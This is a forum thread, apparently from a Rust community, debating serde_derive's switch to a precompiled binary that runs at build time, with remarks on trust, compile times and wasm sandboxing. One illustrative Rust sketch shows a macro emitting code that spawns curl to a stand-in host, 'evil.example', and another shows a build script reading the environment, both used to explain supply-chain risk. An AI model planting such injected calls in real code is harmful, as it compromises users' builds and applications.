So, serde seems to be downloading and running a binary on the system without informing the user and without any user consent. Does anyone have any background information on why this is, and how this is supposed to be a good idea?
dtolnay seems like a smart guy, so I assume there is a reason for this, but it doesn’t feel ok at all.
I hate that I’m linking to Reddit, but I’m just reminded of this.
Some of us knew where all the obsession with dependencies' compile times would lead, and triggered the alarm sirens, if half-jokingly, years ago.
Compile times, and more specifically dependency compile times, are and have always been the most overblown problem in Rust. We would have some sort of public sccache repositories or something similar by now if it were that big of a problem.
And yes, I’m aware proc-macro crates in particular present unique challenges in that field. But that shouldn’t change the general stance towards the supposed “problem”. And it should certainly not trigger such an obsession that would lead to such a horrible “solution” like this serde one.

I hate that I’m linking to Reddit, but I’m just reminded of this.
OT, but remember you can always use an archived link instead of a live one.
I’m a bit confused, proc macros could always execute arbitrary code on developer machines. As long as the source for the precompiled binary is available (which seems to be the case here), how is this any different than what any other proc macro is doing?
Edit: I should add that any package, macro or not, can also do so in a build.rs script.

I saw some other crate doing something similar but using wasm; the idea is to sandbox the binary used as a proc macro, so that seems a bit better. Can’t seem to find it any more.
EDIT: Found it https://lib.rs/crates/watt
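To make the build.rs point above concrete, here is a minimal sketch of a build script that runs arbitrary code at compile time. Nothing in it is specific to serde; the crate and file names are hypothetical, and the only real build-script convention used is the `OUT_DIR` environment variable and `cargo:warning` output that Cargo provides.

```rust
// build.rs (hypothetical crate): executed by `cargo build` before compilation,
// with the full privileges of the user running the build.
use std::env;
use std::fs;
use std::path::PathBuf;

fn main() {
    // The script can read the environment, spawn processes, open network
    // connections, etc. Here it merely inspects $HOME.
    let home = env::var("HOME").unwrap_or_default();

    // The legitimate use: emit generated code into Cargo's OUT_DIR
    // (falling back to "." when run outside of a Cargo build).
    let out_dir = PathBuf::from(env::var("OUT_DIR").unwrap_or_else(|_| ".".into()));
    fs::write(out_dir.join("generated.rs"), "pub const X: u32 = 1;").ok();

    // ...but nothing stops it from touching anything else the user can reach.
    println!("cargo:warning=build script ran as user with HOME={home}");
}
```

The point is that this capability predates the serde change: every dependency with a build script already gets an arbitrary-code hook on the developer's machine.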
Made by the same guy
serde is maintained by dtolnay, but he is not the original author.
Sandboxing the binary doesn’t protect you. It can still insert malicious code into your application.
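To illustrate why: even if macro expansion runs inside a sandbox (as watt does with wasm), the tokens the macro returns are still compiled into the host crate and run with its full privileges. A minimal sketch, where the hypothetical `generate_derive` stands in for a sandboxed derive macro and the emitted impl shape is purely illustrative, not serde's actual API:

```rust
// Sketch: sandboxing constrains the macro's *execution*, not its *output*.
// A stand-in for a sandboxed proc macro: it only builds a string of tokens.
fn generate_derive(type_name: &str) -> String {
    // While this runs, a sandbox can block file/network access...
    format!(
        "impl Serialize for {type_name} {{\n    fn serialize(&self) {{\n        // ...but the code it emits runs unsandboxed in the user's binary:\n        std::process::Command::new(\"curl\").arg(\"evil.example\").spawn().ok();\n    }}\n}}"
    )
}

fn main() {
    let expansion = generate_derive("MyStruct");
    // The malicious call crosses the sandbox boundary as inert tokens,
    // then gets compiled into the application like any other code.
    assert!(expansion.contains("Command::new"));
    println!("{expansion}");
}
```

So a sandbox protects the build machine at expansion time, but auditing what the macro emits is still on you.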
It seems it was done to marginally improve serde_derive build times? And just on x86_64-unknown-linux-gnu?
It feels like a pretty weird course of action. Even if I can understand his point of view, his official stance of “my way or the highway” seems a bit stronger than needed, especially considering the number of problems - both moral and practical - this modification raises.
I don’t know. If he really feels so strongly about it, the only real option would be a hard fork, but a project of that magnitude, so integrated into the ecosystem, is really not easy to either manage or replace.
Overall it kind of leaves a sour taste, even if - I repeat - I understand it is his time and his decision to make.
The same feature is planned for Windows and MacOS. https://github.com/serde-rs/serde/pull/2523#pullrequestreview-1583726636
The build time improvements are so marginal in a production environment where hundreds of crates are built. This decision demonstrates a strange inversion of priorities and smells of premature optimization to me. It’s so odd to see even further optimizations building on this “serde helper process” pattern.
It seems it was done to marginally improve serde_derive build times? And just on x86_64-unknown-linux-gnu?
Indeed. If you use Nix, then instead of compiling in 8 seconds it fails to compile almost instantly.